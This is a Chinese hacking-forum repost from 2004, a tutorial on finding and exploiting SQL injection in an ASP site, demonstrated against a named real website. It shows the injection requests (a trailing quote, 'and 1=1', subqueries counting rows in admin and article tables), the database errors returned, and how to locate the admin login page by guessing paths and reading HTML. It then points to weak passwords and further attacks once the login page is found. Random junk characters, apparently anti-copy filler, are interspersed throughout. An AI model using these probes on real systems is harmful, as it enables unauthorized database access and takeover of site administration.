- 在线时间
- 0 小时
- 最后登录
- 2007-9-23
- 注册时间
- 2004-9-10
- 听众数
- 3
- 收听数
- 0
- 能力
- 0 分
- 体力
- 9975 点
- 威望
- 7 点
- 阅读权限
- 150
- 积分
- 4048
- 相册
- 0
- 日志
- 0
- 记录
- 0
- 帖子
- 1893
- 主题
- 823
- 精华
- 2
- 分享
- 0
- 好友
- 0
我的地盘我做主
该用户从未签到
 |
作者:枫三少 转自:黑基bbs原创作品版4 z0 g9 U# \6 I6 Z2 s n9 M
# r f& @! S# f p! j
有很多人问过我这个问题。老是听说,看到文章里谁谁谁怎么分析别人的代码怎么来入侵的。那么怎么找代码呢?
. V; ^- F/ I: _8 d$ T" E* p+ `2 [
: K: M1 {' I4 V: _1 p; Z1 k分析代码,首先你得有源代码。如果找源代码呢?呵呵,假如是分析DV的,就下一个DV的来,看看他的代码。. H; P% x) p" `/ e2 g; e
4 K# ^! o/ H8 C* r: M在实战中往往因为时间的愿意我们采用的还有从HTML代码入手。& [3 ~, b& J! b4 o+ b3 ?0 N
; ]5 ]$ }$ M& m这里我简单的介绍一个过程吧。2 x! Q0 I) B" j! Z( K8 n* P
1 C6 b+ ~ T0 ]
首先我找到一个网站,是我们基地首页有连接的
' B7 D( b. j4 W' t! o. Nhttp://www.16china.com/hack/
' u$ W1 F( z2 z: i3 {* F" j5 Q! |* P6 q6 z( {" `) d' C1 }: i
随便选择一个分页:4 G# u1 y* ?6 D) C7 Y5 B
http://www.16china.com/hack/SoftView.Asp?SoftID=139
) u2 c) P6 c( w9 `典型的ASP。看看能不能注射
* s* t/ V. d5 zhttp://www.16china.com/hack/SoftView.Asp?SoftID=139': T* |" Q9 b7 _) Y7 a4 U( I$ R
返回:! P9 H1 [) a+ F Q D o
Microsoft VBScript 编译器错误 错误 '800a03f6'
6 d# c( t8 K3 O1 }- H3 p( l1 v: k% D3 G0 D, s$ W" d. ~+ \1 Q
缺少 'End'
" a, U$ R6 I8 ?& \& R. Z
& F, e8 ]& ?7 f4 N' k/iisHelp/common/500-100.asp,行242
$ |4 Y& M/ w. M. i3 V
/ Q! x6 w3 d) H5 p. [8 QMicrosoft JET Database Engine 错误 '80040e14' ; i& _" [, L2 L: k; D4 s( f# s" G
, @; j# z7 v! O) D
字符串的语法错误 在查询表达式 'SoftInfo.CateID=Category.CateID and SoftInfo.SubID=SubCate.SubID and SoftInfo.SoftID=139'' 中。 ' @" @* w, f4 W4 h! q2 W
9 Y7 L# V; ?4 W" b" `/hack/SoftView.Asp,行17
: U$ [; L# ]0 M1 w1 M' |8 F4 z再来:
- U- k; e5 e0 Ahttp://www.16china.com/hack/SoftView.Asp?SoftID=139%20and%201=1
& P1 Y0 c* ^( |) x返回正常网页。( f' o- ^( @& t. t. V
+ v5 v% p- B1 `- @+ p提交:# A* U) [# p/ d' B
http://www.16china.com/hack/Soft ... %20(select%20count(*)%20from%20admin)>=0% ?6 [7 v6 o# I' z$ z/ V' P+ L0 E
; \# \0 X5 m- K返回正常页/+ `& m# s& U, i6 A F" X
http://www.16china.com/hack/Soft ... %20(select%20count(*)%20from%20article)>=02 s# M5 ?7 k! z9 Q6 p
! W) f5 J+ ]* _8 i5 I同样正常。; j7 A) c0 W* E4 A
! ^0 \( R) ?5 v- R- L: Rhttp://www.16china.com/hack/Soft ... )%20from%20article)>=0
& t+ w, Y, Z3 z
* P( i3 h9 s. Y……5 j+ H3 f+ k$ [" o; g0 u
; O9 d0 J/ k' Y/ b1 _象上面这样我们就可以成功注射网站。那么在拿到管理员帐号密码后如何找后台
1 |6 ?9 ?% d1 \2 f$ n按以往的经验我采用:
0 N- \5 ^1 O4 S; z# O0 Rhttp://www.16china.com/hack/admin /*这里的”ADMIN“可以用LOGIN等替换*/
# ] B* _ `# {$ a) r# n; R我为什么不用http://www.16china.com/hack/admin.asp# R) g) z/ o, j5 X
http://www.16china.com/hack/admin/index.asp呢?因为我不知道他文件夹里的东西有没有被修改。如果存在ADMIN文件夹,但是并不是常用首页的话IE将返回如“你没有权限浏览网页……”等信息,一般来说我们可以确定后台就在那里。
/ J5 o$ Y! m |0 c* _- \) chttp://www.16china.com/hack/admin返回信息:, x" a! P/ S0 e- o' t2 P# h
错误提示信息!
& m: W7 |+ p; ^: i, G5 a' M 产生错误的可能原因:1 ~9 P2 B; \# v/ X8 y5 C+ Z
% ?( o6 D0 M% ^
8 J1 Q& W9 ]. M9 P7 ?您没有进入本页面的权限!本次操作已被记录!
/ n8 [, x A5 E C' ~, \; ?可能您还没有登陆或者不具有使用当前功能的权限!请联系管理员.0 H! O) h8 R% B0 k1 B4 P
本页面为[管理员]专用,请先登陆后进入.
8 C! m3 T' M( w9 A; Q
8 F2 R' z4 F: x( n$ ~4 Y" L+ Y5 }返回上一页... /*说明登陆URL为常用的如:index.asp...*/
% a' s& k+ e p/ g2 |4 z查看HTML代码:: |/ O$ q- e: \+ V* M0 ^7 M+ Q
<html><head><title>错误提示信息!</title>6 x' `& l' Y! I" p9 }2 `& n" Z
3 o2 w4 o' C1 s1 S, ]9 q
……
3 B* W, F3 x0 q% {1 X; Y& |; {6 p; t4 y
<a href=adminlogin.asp class=meun target=_top>登陆</a>后进入./ G9 W1 W0 Y( A5 O6 b5 ^4 g! Z1 h
……3 |8 O& R$ e7 y& b
7 C7 @ X% L; {. v
找到了:6 q6 Z5 z' y8 P3 Y/ e. S
http://www.16china.com/hack/admin/adminlogin.asp
A# `9 t9 [) @( F. B0 O& i" [: \/ Q/ |, v5 K P, H
% [+ O; @- T. P/ A' U% M1 K
看看他的源代码告诉我们些什么:
* l, L3 M% p7 s/ I; t9 u6 ?! m; c# d- |" N) ], c9 c
<html>
1 Y7 ^/ j7 t9 x
2 s; `, ?1 D2 r<head>
5 s+ I- i) X/ k r<title>管理员登陆</title>
, w9 c6 H+ g. h& O
) Q- X: c. b1 Z, {: r……………* a% R/ s V! ]
9 N( q6 g( z, A p. q k- x
关于数据库表名这些这里不多讲,看看,如果我们输入正确的帐号密码将回进入
' q8 z5 V8 b7 o% g ohttp://www.16china.com/hack/admin/adminlogin.asp?action=login
. d. Q3 x( m; N [7 x- E; J1 U R这里。- _3 i1 u8 A j2 `: L, [6 k6 C' i
+ q/ Z( k: o( v8 X% g" b4 o
只要知道了后台,我们就有很多办法,如弱口令,SQL本地执行(赢政下载系统)……- t# I' m0 B5 C# k5 [ @% h c- T
% w4 P& Z1 \, _( C# i懂了吗?好了,时间关系加上本人技术原因就写到这里吧。不懂的可以跟贴,大家一起讨论一下:) |
zan
|
IP卡
狗仔卡
发表于 2004-10-4 00:36
转播
淘帖
分享
收藏
支持
反对
微信
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
抢沙发
显身卡
